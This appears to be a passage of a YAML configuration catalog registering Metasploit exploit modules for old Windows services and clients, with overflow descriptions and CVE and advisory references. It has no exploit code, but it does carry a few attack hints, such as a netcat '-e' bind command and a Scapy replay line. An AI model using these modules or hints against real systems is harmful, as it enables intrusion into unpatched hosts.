path: extensions/metasploit/
class: Msf_module
msf_bigant_server_usv:
enable: true
msf: true
msf_key: windows/misc/bigant_server_usv
name: BigAnt Server 2.52 USV Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis exploits a stack buffer overflow in the BigAnt Messaging Service,\n\
\t\t\t\tpart of the BigAnt Server product suite. This module was tested\n\
\t\t\t\tsuccessfully against version 2.52.\n\n\
\t\t\t\tNOTE: The AntServer service does not restart, you only get one shot.\n\
\t\t\t"
authors:
- - OSVDB
- "61386"
- - URL
- http://www.exploit-db.com/exploits/10765
- - URL
- http://www.exploit-db.com/exploits/10973
path: extensions/metasploit/
class: Msf_module
msf_asus_dpcproxy_overflow:
enable: true
msf: true
msf_key: windows/misc/asus_dpcproxy_overflow
name: Asus Dpcproxy Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19.\n\
\t\t\t\t\tIt should be vulnerable until version 2.0.0.24.\n\
\t\t\t\t\tCredit to Luigi Auriemma\n\
\t\t\t"
authors:
- - CVE
- 2008-1491
- - OSVDB
- "43638"
- - BID
- "28394"
path: extensions/metasploit/
class: Msf_module
msf_ib_isc_create_database:
enable: true
msf: true
msf_key: windows/misc/ib_isc_create_database
name: Borland InterBase isc_create_database() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted create request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38606"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_apple_quicktime_rtsp_response:
enable: true
msf: true
msf_key: windows/misc/apple_quicktime_rtsp_response
name: Apple QuickTime 7.3 RTSP Response Header Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long\n\
\t\t\t\tRTSP response to a client, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-6166
- - OSVDB
- "40876"
- - BID
- "26549"
- - URL
- http://milw0rm.com/exploits/4648
path: extensions/metasploit/
class: Msf_module
msf_ms07_064_sami:
enable: true
msf: true
msf_key: windows/misc/ms07_064_sami
name: Microsoft DirectX DirectShow SAMI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the DirectShow Synchronized\n\
\t\t\t\tAccessible Media Interchanged (SAMI) parser in quartz.dll. This module\n\
\t\t\t\thas only been tested with Windows Media Player (6.4.09.1129) and\n\
\t\t\t\tDirectX 8.0.\n\
\t\t\t"
authors:
- - CVE
- 2007-3901
- - OSVDB
- "39126"
- - MSB
- MS07-064
- - BID
- "26789"
path: extensions/metasploit/
class: Msf_module
msf_sap_2005_license:
enable: true
msf: true
msf_key: windows/misc/sap_2005_license
name: SAP Business One License Manager 2005 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the SAP Business One 2005\n\
\t\t\t\t\tLicense Manager 'NT Naming Service' A and B releases. By sending an\n\
\t\t\t\t\texcessively long string the stack is overwritten enabling arbitrary\n\
\t\t\t\t\tcode execution.\n\
\t\t\t"
authors:
- - OSVDB
- "56837"
- - CVE
- 2009-4988
- - BID
- "35933"
- - URL
- http://www.milw0rm.com/exploits/9319
path: extensions/metasploit/
class: Msf_module
msf_wireshark_packet_dect:
enable: true
msf: true
msf_key: windows/fileformat/wireshark_packet_dect
name: Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (local)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Wireshark <= 1.4.4\n\
\t\t\t\tWhen opening a malicious .pcap file in Wireshark, a stack buffer occurs,\n\
\t\t\t\tresulting in arbitrary code execution.\n\n\
\t\t\t\tNote: To exploit the vulnerability remotely with Scapy: sendp(rdpcap(\"file\"))\n\
\t\t\t"
authors:
- - CVE
- 2011-1591
- - OSVDB
- "71848"
- - URL
- https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838
- - URL
- https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836
- - URL
- http://www.exploit-db.com/exploits/17185
path: extensions/metasploit/
class: Msf_module
msf_hp_omniinet_3:
enable: true
msf: true
msf_key: windows/misc/hp_omniinet_3
name: HP OmniInet.exe Opcode 27 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Hewlett-Packard\n\
\t\t\t\tOmniInet NT Service. By sending a specially crafted opcode 27 packet,\n\
\t\t\t\ta remote attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2011-1865
- - OSVDB
- "73571"
- - URL
- http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
path: extensions/metasploit/
class: Msf_module
msf_agentxpp_receive_agentx:
enable: true
msf: true
msf_key: windows/misc/agentxpp_receive_agentx
name: AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits a stack buffer overflow in the AgentX++ library, as used by\n\
\t\t\t\tvarious applications. By sending a specially crafted request, an attacker can\n\
\t\t\t\texecute arbitrary code, potentially with SYSTEM privileges.\n\n\
\t\t\t\tThis module was tested successfully against master.exe as included with Real\n\
\t\t\t\tNetwork\\'s Helix Server v12. When installed as a service with Helix Server,\n\
\t\t\t\tthe service runs as SYSTEM, has no recovery action, but will start automatically\n\
\t\t\t\ton boot.\n\n\
\t\t\t\tThis module does not work with NX/XD enabled but could be modified easily to\n\
\t\t\t\tdo so. The address\n\
\t\t\t"
authors:
- - CVE
- 2010-1318
- - OSVDB
- "63919"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867
path: extensions/metasploit/
class: Msf_module
msf_citrix_streamprocess:
enable: true
msf: true
msf_key: windows/misc/citrix_streamprocess
name: Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.\n\
\t\t\t\tBy sending a specially crafted packet to the Provisioning Services server, a fixed\n\
\t\t\t\tlength buffer on the stack can be overflowed and arbitrary code can be executed.\n\
\t\t\t"
authors:
- - OSVDB
- "70597"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-11-023/
- - URL
- http://secunia.com/advisories/42954/
- - URL
- http://support.citrix.com/article/CTX127149
path: extensions/metasploit/
class: Msf_module
msf_landesk_aolnsrvr:
enable: true
msf: true
msf_key: windows/misc/landesk_aolnsrvr
name: LANDesk Management Suite 8.7 Alert Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending\n\
\t\t\t\tan overly long string to the Alert Service, a buffer is overwritten and arbitrary\n\
\t\t\t\tcode can be executed.\n\
\t\t\t"
authors:
- - CVE
- 2007-1674
- - OSVDB
- "34964"
- - URL
- http://www.tippingpoint.com/security/advisories/TSRT-07-04.html
path: extensions/metasploit/
class: Msf_module
msf_shixxnote_font:
enable: true
msf: true
msf_key: windows/misc/shixxnote_font
name: ShixxNOTE 6.net Font Field Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in ShixxNOTE 6.net.\n\
\t\t\t\tThe vulnerability is caused due to boundary errors in the\n\
\t\t\t\thandling of font fields.\n\
\t\t\t"
authors:
- - CVE
- 2004-1595
- - OSVDB
- "10721"
- - BID
- "11409"
path: extensions/metasploit/
class: Msf_module
msf_hp_omniinet_1:
enable: true
msf: true
msf_key: windows/misc/hp_omniinet_1
name: HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Hewlett-Packard\n\
\t\t\t\tOmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n\
\t\t\t\tpacket, a remote attacker may be able to execute arbitrary code with elevated\n\
\t\t\t\tprivileges.\n\n\
\t\t\t\tThis service is installed with HP OpenView Data Protector, HP Application\n\
\t\t\t\tRecovery Manager and potentially other products. This exploit has been tested\n\
\t\t\t\tagainst versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n\
\t\t\t\tof Application Recovery Manager.\n\n\
\t\t\t\tNOTE: There are actually two consecutive wcscpy() calls in the program (which\n\
\t\t\t\tmay be why ZDI considered them two separate issues). However, this module only\n\
\t\t\t\texploits the first one.\n\
\t\t\t"
authors:
- - CVE
- 2007-2280
- - BID
- "37396"
- - OSVDB
- "61206"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-099
path: extensions/metasploit/
class: Msf_module
msf_realtek_playlist:
enable: true
msf: true
msf_key: windows/misc/realtek_playlist
name: Realtek Media Player Playlist Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Realtek Media Player(RtlRack) A4.06.\n\
\t\t\t\tWhen a Realtek Media Player client opens a specially crafted playlist, an\n\
\t\t\t\tattacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-5664
- - OSVDB
- "50715"
- - BID
- "32860"
path: extensions/metasploit/
class: Msf_module
msf_talkative_response:
enable: true
msf: true
msf_key: windows/misc/talkative_response
name: Talkative IRC v0.4.4.16 Response Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Talkative IRC v0.4.4.16.\n\
\t\t\t\tWhen a specially crafted response string is sent to a client,\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "64582"
- - BID
- "34141"
- - URL
- http://milw0rm.com/exploits/8227
path: extensions/metasploit/
class: Msf_module
msf_borland_starteam:
enable: true
msf: true
msf_key: windows/misc/borland_starteam
name: Borland CaliberRM StarTeam Multicast Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending\n\
\t\t\t\ta specially crafted GET request to the STMulticastService, an attacker may be\n\
\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0311
- - OSVDB
- "44039"
- - BID
- "28602"
path: extensions/metasploit/
class: Msf_module
msf_eiqnetworks_esa_topology:
enable: true
msf: true
msf_key: windows/misc/eiqnetworks_esa_topology
name: eIQNetworks ESA Topology DELETEDEVICE Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in eIQnetworks\n\
\t\t\t\tEnterprise Security Analyzer. During the processing of\n\
\t\t\t\tlong arguments to the DELETEDEVICE command in the Topology\n\
\t\t\t\tserver, a stack-based buffer overflow occurs.\n\n\
\t\t\t\tThis module has only been tested against ESA v2.1.13.\n\
\t\t\t"
authors:
- - CVE
- 2006-3838
- - OSVDB
- "27528"
- - BID
- "19164"
path: extensions/metasploit/
class: Msf_module
msf_bigant_server:
enable: true
msf: true
msf_key: windows/misc/bigant_server
name: BigAnt Server 2.2 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in BigAnt Server 2.2.\n\
\t\t\t\tBy sending a specially crafted packet, an attacker may be\n\
\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-1914
- - OSVDB
- "44454"
- - BID
- "28795"
path: extensions/metasploit/
class: Msf_module
msf_fb_isc_create_database:
enable: true
msf: true
msf_key: windows/misc/fb_isc_create_database
name: Firebird Relational Database isc_create_database() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted create request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38606"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_poppeeper_uidl:
enable: true
msf: true
msf_key: windows/misc/poppeeper_uidl
name: POP Peeper v3.4 UIDL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in POP Peeper v3.4.\n\
\t\t\t\tWhen a specially crafted UIDL string is sent to a client,\n\
\t\t\t\tan attacker may be able to execute arbitrary code. This\n\
\t\t\t\tmodule is based off of krakowlabs code.\n\
\t\t\t"
authors:
- - OSVDB
- "53559"
- - CVE
- 2009-1029
- - BID
- "33926"
- - URL
- http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_uidl-bof.txt
path: extensions/metasploit/
class: Msf_module
msf_ibm_tsm_cad_ping:
enable: true
msf: true
msf_key: windows/misc/ibm_tsm_cad_ping
name: IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service.\n\
\t\t\t\tBy sending a \"ping\" packet containing a long string, an attacker can execute arbitrary code.\n\n\
\t\t\t\tNOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order\n\
\t\t\t\tfor the vulnerable code to be reached. This state doesn't appear to be reachable when the\n\
\t\t\t\tTSM server is not running. This service does not restart.\n\
\t\t\t"
authors:
- - CVE
- 2009-3853
- - OSVDB
- "59632"
path: extensions/metasploit/
class: Msf_module
msf_bakbone_netvault_heap:
enable: true
msf: true
msf_key: windows/misc/bakbone_netvault_heap
name: BakBone NetVault Remote Heap Overflow
category: Metasploit
description: "\n\
\t\tThis module exploits a heap overflow in the BakBone NetVault\n\
\tProcess Manager service. This code is a direct port of the netvault.c\n\
\tcode written by nolimit and BuzzDee.\n\
\t\t\t"
authors:
- - CVE
- 2005-1009
- - OSVDB
- "15234"
- - BID
- "12967"
path: extensions/metasploit/
class: Msf_module
msf_hp_omniinet_4:
enable: true
msf: true
msf_key: windows/misc/hp_omniinet_4
name: HP OmniInet.exe Opcode 20 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found in HP Data Protector's OmniInet\n\
\t\t\t\tprocess. By supplying a long string of data as the file path with opcode '20',\n\
\t\t\t\ta buffer overflow can occur when this data is being written on the stack where\n\
\t\t\t\tno proper bounds checking is done beforehand, which results arbitrary code\n\
\t\t\t\texecution under the context of SYSTEM. This module is also made against systems\n\
\t\t\t\tsuch as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\n\
\t\t\t\tenabled by default.\n\
\t\t\t"
authors:
- - CVE
- 2011-1865
- - OSVDB
- "73571"
- - URL
- http://www.exploit-db.com/exploits/17468/
- - URL
- http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities
- - URL
- http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182
path: extensions/metasploit/
class: Msf_module
msf_eiqnetworks_esa:
enable: true
msf: true
msf_key: windows/misc/eiqnetworks_esa
name: eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in eIQnetworks\n\
\t\t\t\tEnterprise Security Analyzer. During the processing of\n\
\t\t\t\tlong arguments to the LICMGR_ADDLICENSE command, a stack-based\n\
\t\t\t\tbuffer overflow occurs. This module has only been tested\n\
\t\t\t\tagainst ESA v2.1.13.\n\
\t\t\t"
authors:
- - CVE
- 2006-3838
- - OSVDB
- "27526"
- - BID
- "19163"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
path: extensions/metasploit/
class: Msf_module
msf_tiny_identd_overflow:
enable: true
msf: true
msf_key: windows/misc/tiny_identd_overflow
name: TinyIdentD 2.2 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack based buffer overflow in TinyIdentD version 2.2.\n\
\t\t\t\tIf we send a long string to the ident service we can overwrite the return\n\
\t\t\t\taddress and execute arbitrary code. Credit to Maarten Boone.\n\
\t\t\t"
authors:
- - CVE
- 2007-2711
- - OSVDB
- "36053"
- - BID
- "23981"
path: extensions/metasploit/
class: Msf_module
msf_windows_rsh:
enable: true
msf: true
msf_key: windows/misc/windows_rsh
name: Windows RSH daemon Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerabliltiy in Windows RSH daemon 1.8.\n\
\t\t\t\tThe vulnerability is due to a failure to check for the length of input sent\n\
\t\t\t\tto the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit\n\
\t\t\t\tto be successful.\n\
\t\t\t"
authors:
- - CVE
- 2007-4006
- - OSVDB
- "38572"
- - BID
- "25044"
path: extensions/metasploit/
class: Msf_module
msf_hp_omniinet_2:
enable: true
msf: true
msf_key: windows/misc/hp_omniinet_2
name: HP OmniInet.exe MSG_PROTOCOL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Hewlett-Packard\n\
\t\t\t\tOmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n\
\t\t\t\tpacket, a remote attacker may be able to execute arbitrary code with elevated\n\
\t\t\t\tprivileges.\n\n\
\t\t\t\tThis service is installed with HP OpenView Data Protector, HP Application\n\
\t\t\t\tRecovery Manager and potentially other products. This exploit has been tested\n\
\t\t\t\tagainst versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n\
\t\t\t\tof Application Recovery Manager.\n\n\
\t\t\t\tNOTE: There are actually two consecutive wcscpy() calls in the program (which\n\
\t\t\t\tmay be why ZDI considered them two separate issues). However, this module only\n\
\t\t\t\texploits the second one.\n\
\t\t\t"
authors:
- - CVE
- 2009-3844
- - BID
- "37250"
- - OSVDB
- "60852"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-091
path: extensions/metasploit/
class: Msf_module
msf_eureka_mail_err:
enable: true
msf: true
msf_key: windows/misc/eureka_mail_err
name: Eureka Email 2.2q ERR Remote Buffer Overflow Exploit
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow in the Eureka Email 2.2q\n\
\t\t\t\tclient that is triggered through an excessively long ERR message.\n\n\
\t\t\t\tNOTE: this exploit isn't very reliable. Unfortunately reaching the\n\
\t\t\t\tvulnerable code can only be done when manually checking mail (Ctrl-M).\n\
\t\t\t\tChecking at startup will not reach the code targeted here.\n\
\t\t\t"
authors:
- - CVE
- 2009-3837
- - OSVDB
- "59262 "
- - URL
- http://www.exploit-db.com/exploits/10235
path: extensions/metasploit/
class: Msf_module
msf_netcat110_nt:
enable: true
msf: true
msf_key: windows/misc/netcat110_nt
name: Netcat v1.10 NT Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Netcat v1.10 NT. By sending\n\
\t\t\t\t\tan overly long string we are able to overwrite SEH. The vulnerability\n\
\t\t\t\t\texists when netcat is used to bind (-e) an executable to a port in doexec.c.\n\
\t\t\t\t\tThis module tested successfully using \"c:\\>nc -L -p 31337 -e ftp\".\n\
\t\t\t\t"
authors:
- - CVE
- 2004-1317
- - OSVDB
- "12612"
- - BID
- "12106"
- - URL
- http://www.milw0rm.com/exploits/726
path: extensions/metasploit/
class: Msf_module
msf_doubletake:
enable: true
msf: true
msf_key: windows/misc/doubletake
name: DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the authentication mechanism of\n\
\t\t\t\t\tNSI Doubletake which is also rebranded as HP Storage Works. This vulnerability\n\
\t\t\t\t\twas found by Titon of Bastard Labs.\n\
\t\t\t"
authors:
- - CVE
- 2008-1661
- - OSVDB
- "45924"
path: extensions/metasploit/
class: Msf_module
msf_borland_interbase:
enable: true
msf: true
msf_key: windows/misc/borland_interbase
name: Borland Interbase Create-Request Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Borland Interbase 2007.\n\
\t\t\t\tBy sending a specially crafted create-request packet, a remote\n\
\t\t\t\tattacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3566
- - OSVDB
- "38602"
- - URL
- http://dvlabs.tippingpoint.com/advisory/TPTI-07-13
path: extensions/metasploit/
class: Msf_module
msf_bcaaa_bof:
enable: true
msf: true
msf_key: windows/misc/bcaaa_bof
name: Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),\n\
\t\t\t\twhich comes as part of the Blue Coat Authentication proxy. Please note that by default,\n\
\t\t\t\tthis exploit will attempt up to three times in order to successfully gain remote code\n\
\t\t\t\texecution (in some cases, it takes as many as five times). This can cause your activity\n\
\t\t\t\tto look even more suspicious. To modify the number of exploit attempts, set the\n\
\t\t\t\tATTEMPTS option.\n\
\t\t\t"
authors:
- - OSVDB
- "72095"
- - URL
- https://kb.bluecoat.com/index?page=content&id=SA55
- - URL
- http://seclists.org/bugtraq/2011/Jul/44
path: extensions/metasploit/
class: Msf_module
msf_bopup_comm:
enable: true
msf: true
msf_key: windows/misc/bopup_comm
name: Bopup Communications Server Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.\n\
\t\t\t\t\tBy sending a specially crafted packet, an attacker may be\n\
\t\t\t\t\table to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-2227
- - OSVDB
- "55275"
- - URL
- http://www.blabsoft.com/products/server
- - URL
- http://milw0rm.com/exploits/9002
path: extensions/metasploit/
class: Msf_module
msf_fb_svc_attach:
enable: true
msf: true
msf_key: windows/misc/fb_svc_attach
name: Firebird Relational Database SVC_attach() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Borland InterBase\n\
\t\t\t\tby sending a specially crafted service attach request.\n\
\t\t\t"
authors:
- - CVE
- 2007-5243
- - OSVDB
- "38605"
- - BID
- "25917"
- - URL
- http://www.risesecurity.org/advisories/RISE-2007002.txt
path: extensions/metasploit/
class: Msf_module
msf_ms05_030_nntp:
enable: true
msf: true
msf_key: windows/nntp/ms05_030_nntp
name: Microsoft Outlook Express NNTP Response Parsing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the news reader of Microsoft\n\
\t\t\t\tOutlook Express.\n\
\t\t\t"
authors:
- - CVE
- 2005-1213
- - OSVDB
- "17306"
- - BID
- "13951"
- - MSB
- MS05-030
path: extensions/metasploit/
class: Msf_module
msf_nmap_stor:
enable: true
msf: true
msf_key: windows/novell/nmap_stor
name: Novell NetMail <= 3.52d NMAP STOR Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's Netmail 3.52 NMAP STOR\n\
\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\
\t\t\t\tbuffer and control program execution.\n\
\t\t\t"
authors:
- - CVE
- 2006-6424
- - OSVDB
- "31363"
- - BID
- "21725"
path: extensions/metasploit/
class: Msf_module
msf_groupwisemessenger_client:
enable: true
msf: true
msf_key: windows/novell/groupwisemessenger_client
name: Novell GroupWise Messenger Client Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's GroupWise Messenger Client.\n\
\t\t\t\tBy sending a specially crafted HTTP response, an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-2703
- - OSVDB
- "46041"
- - BID
- "29602"
- - URL
- http://www.infobyte.com.ar/adv/ISR-17.html
path: extensions/metasploit/
class: Msf_module
msf_zenworks_desktop_agent:
enable: true
msf: true
msf_key: windows/novell/zenworks_desktop_agent
name: Novell ZENworks 6.5 Desktop/Server Management Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a heap overflow in the Novell ZENworks\n\
\t\t\t\tDesktop Management agent. This vulnerability was discovered\n\
\t\t\t\tby Alex Wheeler.\n\
\t\t\t"
authors:
- - CVE
- 2005-1543
- - OSVDB
- "16698"
- - BID
- "13678"
path: extensions/metasploit/
class: Msf_module
msf_ms04_045_wins:
enable: true
msf: true
msf_key: windows/wins/ms04_045_wins
name: Microsoft WINS Service Memory Overwrite
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits an arbitrary memory write flaw in the\n\
\t\t\t\tWINS service. This exploit has been tested against Windows\n\
\t\t\t\t2000 only.\n\n\
\t\t\t"
authors:
- - CVE
- 2004-1080
- - OSVDB
- "12378"
- - BID
- "11763"
- - MSB
- MS04-045
path: extensions/metasploit/
class: Msf_module
msf_xlink_nfsd:
enable: true
msf: true
msf_key: windows/nfs/xlink_nfsd
name: Omni-NFS Server Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2\n\
\t\t\t\tWhen sending a specially crafted nfs packet, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-5780
- - OSVDB
- "30224"
- - BID
- "20941"
- - URL
- http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm
path: extensions/metasploit/
class: Msf_module
msf_safenet_ike_11:
enable: true
msf: true
msf_key: windows/vpn/safenet_ike_11
name: SafeNet SoftRemote IKE Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Safenet SoftRemote IKE IreIKE.exe\n\
\t\t\t\tservice. When sending a specially crafted udp packet to port 62514 an\n\
\t\t\t\tattacker may be able to execute arbitrary code. This module has\n\
\t\t\t\tbeen tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using\n\
\t\t\t\twindows/meterpreter/reverse_ord_tcp payloads.\n\
\t\t\t"
authors:
- - CVE
- 2009-1943
- - OSVDB
- "54831"
- - BID
- "35154"
- - URL
- http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1
path: extensions/metasploit/
class: Msf_module
msf_putty_msg_debug:
enable: true
msf: true
msf_key: windows/ssh/putty_msg_debug
name: PuTTy.exe <= v0.53 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the PuTTY SSH client that is triggered\n\
\t\t\t\tthrough a validation error in SSH.c.\n\
\t\t\t"
authors:
- - CVE
- 2002-1359
- - OSVDB
- "8044"
- - URL
- http://www.rapid7.com/advisories/R7-0009.html
- - BID
- "6407"
path: extensions/metasploit/
class: Msf_module
msf_freesshd_key_exchange:
enable: true
msf: true
msf_key: windows/ssh/freesshd_key_exchange
name: FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.\n\
\t\t\t\tThis flaw is due to a buffer overflow error when handling a specially\n\
\t\t\t\tcrafted key exchange algorithm string received from an SSH client.\n\
\t\t\t"
authors:
- - CVE
- 2006-2407
- - OSVDB
- "25463"
- - BID
- "17958"
path: extensions/metasploit/
class: Msf_module
msf_freeftpd_key_exchange:
enable: true
msf: true
msf_key: windows/ssh/freeftpd_key_exchange
name: FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a simple stack buffer overflow in FreeFTPd 1.0.10\n\
\t\t\t\tThis flaw is due to a buffer overflow error when handling a specially\n\
\t\t\t\tcrafted key exchange algorithm string received from an SSH client.\n\
\t\t\t\tThis module is based on MC's freesshd_key_exchange exploit.\n\
\t\t\t"
authors:
- - CVE
- 2006-2407
- - OSVDB
- "25569"
- - BID
- "17958"
path: extensions/metasploit/
class: Msf_module
msf_securecrt_ssh1:
enable: true
msf: true
msf_key: windows/ssh/securecrt_ssh1
name: SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in SecureCRT <= 4.0\n\
\t\t\t\tBeta 2. By sending a vulnerable client an overly long\n\
\t\t\t\tSSH1 protocol identifier string, it is possible to execute\n\
\t\t\t\tarbitrary code.\n\n\
\t\t\t\tThis module has only been tested on SecureCRT 3.4.4.\n\
\t\t\t"
authors:
- - CVE
- 2002-1059
- - OSVDB
- "4991"
- - BID
- "5287"
path: extensions/metasploit/
class: Msf_module
msf_alphastor_agent:
enable: true
msf: true
msf_key: windows/emc/alphastor_agent
name: EMC AlphaStor Agent Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in EMC AlphaStor 3.1.\n\
\t\t\t\tBy sending a specially crafted message, an attacker may\n\
\t\t\t\tbe able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-2158
- - OSVDB
- "45714"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=702
path: extensions/metasploit/
class: Msf_module
msf_java_docbase_bof:
enable: true
msf: true
msf_key: windows/browser/java_docbase_bof
name: Sun Java Runtime New Plugin docbase Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a flaw in the new plugin component of the Sun Java\n\
\t\t\t\tRuntime Environment before v6 Update 22. By specifying specific parameters\n\
\t\t\t\tto the new plugin, an attacker can cause a stack-based buffer overflow and\n\
\t\t\t\texecute arbitrary code.\n\n\
\t\t\t\tWhen the new plugin is invoked with a \"launchjnlp\" parameter, it will\n\
\t\t\t\tcopy the contents of the \"docbase\" parameter to a stack-buffer using the\n\
\t\t\t\t\"sprintf\" function. A string of 396 bytes is enough to overflow the 256\n\
